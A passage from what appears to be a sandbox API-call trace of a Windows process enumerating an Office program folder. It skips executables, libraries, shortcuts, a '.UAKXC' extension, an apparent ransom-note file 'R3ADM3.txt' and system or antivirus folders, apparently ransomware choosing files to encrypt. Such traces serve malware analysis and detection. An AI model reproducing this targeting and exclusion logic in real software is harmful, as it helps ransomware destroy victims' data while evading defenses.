(lpFirst="ENVELOPE.DLL", lpSrch=".exe") returned 0x0 [0158.779] StrStrIW (lpFirst="ENVELOPE.DLL", lpSrch=".dll") returned=".DLL" [0158.779] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0675200, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x81e8ee40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa0675200, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x14fa0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERXIMP.ADD", cAlternateFileName="")) returned 1 [0158.779] lstrcmpW (lpString1="ERXIMP.ADD", lpString2=".") returned 1 [0158.779] lstrcmpW (lpString1="ERXIMP.ADD", lpString2="..") returned 1 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch=".UAKXC") returned 0x0 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch=".exe") returned 0x0 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch=".dll") returned 0x0 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch=".lnk") returned 0x0 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch=".sys") returned 0x0 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch=".msi") returned 0x0 [0158.779] StrStrIW (lpFirst="ERXIMP.ADD", lpSrch="R3ADM3.txt") returned 0x0 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b60 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0b60 | out: hHeap=0xea0000) returned 1 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b60 [0158.780] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9740 [0158.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xea0000) returned 1 [0158.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.780] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cdf900, ftCreationTime.dwHighDateTime=0x1cac26b, ftLastAccessTime.dwLowDateTime=0x5221e250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52cdf900, ftLastWriteTime.dwHighDateTime=0x1cac26b, nFileSizeHigh=0x0, nFileSizeLow=0x1aecb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXCEL.EXE", cAlternateFileName="")) returned 1 [0158.780] lstrcmpW (lpString1="EXCEL.EXE", lpString2=".") returned 1 [0158.780] lstrcmpW (lpString1="EXCEL.EXE", lpString2="..") returned 1 [0158.780] StrStrIW (lpFirst="EXCEL.EXE", lpSrch=".UAKXC") returned 0x0 [0158.780] StrStrIW (lpFirst="EXCEL.EXE", lpSrch=".exe") returned=".EXE" [0158.780] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8e14a00, ftCreationTime.dwHighDateTime=0x1cac1f0, ftLastAccessTime.dwLowDateTime=0x6099bdd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8e14a00, ftLastWriteTime.dwHighDateTime=0x1cac1f0, nFileSizeHigh=0x0, nFileSizeLow=0x4ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="excel.exe.manifest", cAlternateFileName="EXCELE~1.MAN")) returned 1 [0158.780] lstrcmpW (lpString1="excel.exe.manifest", lpString2=".") returned 1 [0158.780] lstrcmpW (lpString1="excel.exe.manifest", lpString2="..") returned 1 [0158.780] StrStrIW (lpFirst="excel.exe.manifest", lpSrch=".UAKXC") returned 0x0 [0158.780] StrStrIW (lpFirst="excel.exe.manifest", lpSrch=".exe") returned=".exe.manifest" [0158.780] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd64d0300, ftCreationTime.dwHighDateTime=0x1cac1f5, ftLastAccessTime.dwLowDateTime=0x70c534f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd64d0300, ftLastWriteTime.dwHighDateTime=0x1cac1f5, nFileSizeHigh=0x0, nFileSizeLow=0x17d6360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="excelcnv.exe", cAlternateFileName="")) returned 1 [0158.780] lstrcmpW (lpString1="excelcnv.exe", lpString2=".") returned 1 [0158.780] lstrcmpW (lpString1="excelcnv.exe", lpString2="..") returned 1 [0158.781] StrStrIW (lpFirst="excelcnv.exe", lpSrch=".UAKXC") returned 0x0 [0158.781] StrStrIW (lpFirst="excelcnv.exe", lpSrch=".exe") returned=".exe" [0158.781] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51bd600, ftCreationTime.dwHighDateTime=0x1cac1f5, ftLastAccessTime.dwLowDateTime=0x70c534f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd51bd600, ftLastWriteTime.dwHighDateTime=0x1cac1f5, nFileSizeHigh=0x0, nFileSizeLow=0xbd60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="excelcnvpxy.dll", cAlternateFileName="EXCELC~1.DLL")) returned 1 [0158.781] lstrcmpW (lpString1="excelcnvpxy.dll", lpString2=".") returned 1 [0158.781] lstrcmpW (lpString1="excelcnvpxy.dll", lpString2="..") returned 1 [0158.781] StrStrIW (lpFirst="excelcnvpxy.dll", lpSrch=".UAKXC") returned 0x0 [0158.781] StrStrIW (lpFirst="excelcnvpxy.dll", lpSrch=".exe") returned 0x0 [0158.781] StrStrIW (lpFirst="excelcnvpxy.dll", lpSrch=".dll") returned=".dll" [0158.781] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51243c00, ftCreationTime.dwHighDateTime=0x1c7ae59, ftLastAccessTime.dwLowDateTime=0x522443b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51243c00, ftLastWriteTime.dwHighDateTime=0x1c7ae59, nFileSizeHigh=0x0, nFileSizeLow=0x1372c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXLIRM.XML", cAlternateFileName="")) returned 1 [0158.781] lstrcmpW (lpString1="EXLIRM.XML", lpString2=".") returned 1 [0158.781] lstrcmpW (lpString1="EXLIRM.XML", lpString2="..") returned 1 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch=".UAKXC") returned 0x0 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch=".exe") returned 0x0 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch=".dll") returned 0x0 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch=".lnk") returned 0x0 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch=".sys") returned 0x0 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch=".msi") returned 0x0 [0158.781] StrStrIW (lpFirst="EXLIRM.XML", lpSrch="R3ADM3.txt") returned 0x0 [0158.781] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b88 [0158.781] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.781] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.781] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.781] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.781] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.781] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0b88 | out: hHeap=0xea0000) returned 1 [0158.781] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b88 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef97b8 [0158.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xea0000) returned 1 [0158.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.782] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51243c00, ftCreationTime.dwHighDateTime=0x1c7ae59, ftLastAccessTime.dwLowDateTime=0x60acc8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51243c00, ftLastWriteTime.dwHighDateTime=0x1c7ae59, nFileSizeHigh=0x0, nFileSizeLow=0x13574, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXLIRMV.XML", cAlternateFileName="")) returned 1 [0158.782] lstrcmpW (lpString1="EXLIRMV.XML", lpString2=".") returned 1 [0158.782] lstrcmpW (lpString1="EXLIRMV.XML", lpString2="..") returned 1 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch=".UAKXC") returned 0x0 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch=".exe") returned 0x0 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch=".dll") returned 0x0 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch=".lnk") returned 0x0 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch=".sys") returned 0x0 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch=".msi") returned 0x0 [0158.782] StrStrIW (lpFirst="EXLIRMV.XML", lpSrch="R3ADM3.txt") returned 0x0 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0bb0 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0bb0 | out: hHeap=0xea0000) returned 1 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0bb0 [0158.782] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9830 [0158.782] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xea0000) returned 1 [0158.783] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.783] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0x73f50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXSEC32.DLL", cAlternateFileName="")) returned 1 [0158.783] lstrcmpW (lpString1="EXSEC32.DLL", lpString2=".") returned 1 [0158.783] lstrcmpW (lpString1="EXSEC32.DLL", lpString2="..") returned 1 [0158.783] StrStrIW (lpFirst="EXSEC32.DLL", lpSrch=".UAKXC") returned 0x0 [0158.783] StrStrIW (lpFirst="EXSEC32.DLL", lpSrch=".exe") returned 0x0 [0158.783] StrStrIW (lpFirst="EXSEC32.DLL", lpSrch=".dll") returned=".DLL" [0158.783] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd3159200, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x533a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXTRACT.DLL", cAlternateFileName="")) returned 1 [0158.783] lstrcmpW (lpString1="EXTRACT.DLL", lpString2=".") returned 1 [0158.783] lstrcmpW (lpString1="EXTRACT.DLL", lpString2="..") returned 1 [0158.783] StrStrIW (lpFirst="EXTRACT.DLL", lpSrch=".UAKXC") returned 0x0 [0158.783] StrStrIW (lpFirst="EXTRACT.DLL", lpSrch=".exe") returned 0x0 [0158.783] StrStrIW (lpFirst="EXTRACT.DLL", lpSrch=".dll") returned=".DLL" [0158.783] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd01e3b60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x18bf68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FACILITY.DLL", cAlternateFileName="")) returned 1 [0158.783] lstrcmpW (lpString1="FACILITY.DLL", lpString2=".") returned 1 [0158.783] lstrcmpW (lpString1="FACILITY.DLL", lpString2="..") returned 1 [0158.783] StrStrIW (lpFirst="FACILITY.DLL", lpSrch=".UAKXC") returned 0x0 [0158.783] StrStrIW (lpFirst="FACILITY.DLL", lpSrch=".exe") returned 0x0 [0158.783] StrStrIW (lpFirst="FACILITY.DLL", lpSrch=".dll") returned=".DLL" [0158.783] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc004c700, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc004c700, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3a780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FORM.DLL", cAlternateFileName="")) returned 1 [0158.783] lstrcmpW (lpString1="FORM.DLL", lpString2=".") returned 1 [0158.783] lstrcmpW (lpString1="FORM.DLL", lpString2="..") returned 1 [0158.783] StrStrIW (lpFirst="FORM.DLL", lpSrch=".UAKXC") returned 0x0 [0158.783] StrStrIW (lpFirst="FORM.DLL", lpSrch=".exe") returned 0x0 [0158.783] StrStrIW (lpFirst="FORM.DLL", lpSrch=".dll") returned=".DLL" [0158.784] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccc730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xccc730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xccc730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0158.784] lstrcmpW (lpString1="FORMS", lpString2=".") returned 1 [0158.784] lstrcmpW (lpString1="FORMS", lpString2="..") returned 1 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="tmp") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="winnt") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="temp") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="thumb") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="$Recycle.Bin") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="System Volume Information") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="Boot") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="Windows") returned 0x0 [0158.784] StrStrIW (lpFirst="FORMS", lpSrch="Trend Micro") returned 0x0 [0158.784] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.784] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.784] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.784] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.784] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0bd8 [0158.784] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.784] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.784] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc59cb00, ftCreationTime.dwHighDateTime=0x1c3e388, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcc59cb00, ftLastWriteTime.dwHighDateTime=0x1c3e388, nFileSizeHigh=0x0, nFileSizeLow=0x88933, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FRENCH.LNG", cAlternateFileName="")) returned 1 [0158.784] lstrcmpW (lpString1="FRENCH.LNG", lpString2=".") returned 1 [0158.784] lstrcmpW (lpString1="FRENCH.LNG", lpString2="..") returned 1 [0158.784] StrStrIW (lpFirst="FRENCH.LNG", lpSrch=".UAKXC") returned 0x0 [0158.784] StrStrIW (lpFirst="FRENCH.LNG", lpSrch=".exe") returned 0x0 [0158.784] StrStrIW (lpFirst="FRENCH.LNG", lpSrch=".dll") returned 0x0 [0158.785] StrStrIW (lpFirst="FRENCH.LNG", lpSrch=".lnk") returned 0x0 [0158.785] StrStrIW (lpFirst="FRENCH.LNG", lpSrch=".sys") returned 0x0 [0158.785] StrStrIW (lpFirst="FRENCH.LNG", lpSrch=".msi") returned 0x0 [0158.785] StrStrIW (lpFirst="FRENCH.LNG", lpSrch="R3ADM3.txt") returned 0x0 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c00 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0c00 | out: hHeap=0xea0000) returned 1 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef98a8 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c00 [0158.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9920 [0158.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef98a8 | out: hHeap=0xea0000) returned 1 [0158.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.785] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd02ee500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x17d368, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GANTT.DLL", cAlternateFileName="")) returned 1 [0158.785] lstrcmpW (lpString1="GANTT.DLL", lpString2=".") returned 1 [0158.785] lstrcmpW (lpString1="GANTT.DLL", lpString2="..") returned 1 [0158.785] StrStrIW (lpFirst="GANTT.DLL", lpSrch=".UAKXC") returned 0x0 [0158.785] StrStrIW (lpFirst="GANTT.DLL", lpSrch=".exe") returned 0x0 [0158.785] StrStrIW (lpFirst="GANTT.DLL", lpSrch=".dll") returned=".DLL" [0158.785] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76567200, ftCreationTime.dwHighDateTime=0x1cbc9ed, ftLastAccessTime.dwLowDateTime=0xd7980ce0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x76567200, ftLastWriteTime.dwHighDateTime=0x1cbc9ed, nFileSizeHigh=0x0, nFileSizeLow=0x26cb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GFX.DLL", cAlternateFileName="")) returned 1 [0158.785] lstrcmpW (lpString1="GFX.DLL", lpString2=".") returned 1 [0158.785] lstrcmpW (lpString1="GFX.DLL", lpString2="..") returned 1 [0158.786] StrStrIW (lpFirst="GFX.DLL", lpSrch=".UAKXC") returned 0x0 [0158.786] StrStrIW (lpFirst="GFX.DLL", lpSrch=".exe") returned 0x0 [0158.786] StrStrIW (lpFirst="GFX.DLL", lpSrch=".dll") returned=".DLL" [0158.786] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f91a00, ftCreationTime.dwHighDateTime=0x1cab8ab, ftLastAccessTime.dwLowDateTime=0x52abf210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66f91a00, ftLastWriteTime.dwHighDateTime=0x1cab8ab, nFileSizeHigh=0x0, nFileSizeLow=0x45a180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GKExcel.dll", cAlternateFileName="")) returned 1 [0158.786] lstrcmpW (lpString1="GKExcel.dll", lpString2=".") returned 1 [0158.786] lstrcmpW (lpString1="GKExcel.dll", lpString2="..") returned 1 [0158.786] StrStrIW (lpFirst="GKExcel.dll", lpSrch=".UAKXC") returned 0x0 [0158.786] StrStrIW (lpFirst="GKExcel.dll", lpSrch=".exe") returned 0x0 [0158.786] StrStrIW (lpFirst="GKExcel.dll", lpSrch=".dll") returned=".dll" [0158.786] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f91a00, ftCreationTime.dwHighDateTime=0x1cab8ab, ftLastAccessTime.dwLowDateTime=0x52b0b4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66f91a00, ftLastWriteTime.dwHighDateTime=0x1cab8ab, nFileSizeHigh=0x0, nFileSizeLow=0x2a6b80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GKPowerPoint.dll", cAlternateFileName="GKPOWE~1.DLL")) returned 1 [0158.786] lstrcmpW (lpString1="GKPowerPoint.dll", lpString2=".") returned 1 [0158.786] lstrcmpW (lpString1="GKPowerPoint.dll", lpString2="..") returned 1 [0158.786] StrStrIW (lpFirst="GKPowerPoint.dll", lpSrch=".UAKXC") returned 0x0 [0158.786] StrStrIW (lpFirst="GKPowerPoint.dll", lpSrch=".exe") returned 0x0 [0158.786] StrStrIW (lpFirst="GKPowerPoint.dll", lpSrch=".dll") returned=".dll" [0158.786] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65c7ed00, ftCreationTime.dwHighDateTime=0x1cab8ab, ftLastAccessTime.dwLowDateTime=0x61a457d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65c7ed00, ftLastWriteTime.dwHighDateTime=0x1cab8ab, nFileSizeHigh=0x0, nFileSizeLow=0x2f8580, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GKWord.dll", cAlternateFileName="")) returned 1 [0158.786] lstrcmpW (lpString1="GKWord.dll", lpString2=".") returned 1 [0158.786] lstrcmpW (lpString1="GKWord.dll", lpString2="..") returned 1 [0158.786] StrStrIW (lpFirst="GKWord.dll", lpSrch=".UAKXC") returned 0x0 [0158.786] StrStrIW (lpFirst="GKWord.dll", lpSrch=".exe") returned 0x0 [0158.786] StrStrIW (lpFirst="GKWord.dll", lpSrch=".dll") returned=".dll" [0158.786] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8748a300, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x52befd10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8748a300, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x623b80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRAPH.EXE", cAlternateFileName="")) returned 1 [0158.786] lstrcmpW (lpString1="GRAPH.EXE", lpString2=".") returned 1 [0158.786] lstrcmpW (lpString1="GRAPH.EXE", lpString2="..") returned 1 [0158.786] StrStrIW (lpFirst="GRAPH.EXE", lpSrch=".UAKXC") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.EXE", lpSrch=".exe") returned=".EXE" [0158.787] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2ca8e00, ftCreationTime.dwHighDateTime=0x1cac1de, ftLastAccessTime.dwLowDateTime=0x61a91a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2ca8e00, ftLastWriteTime.dwHighDateTime=0x1cac1de, nFileSizeHigh=0x0, 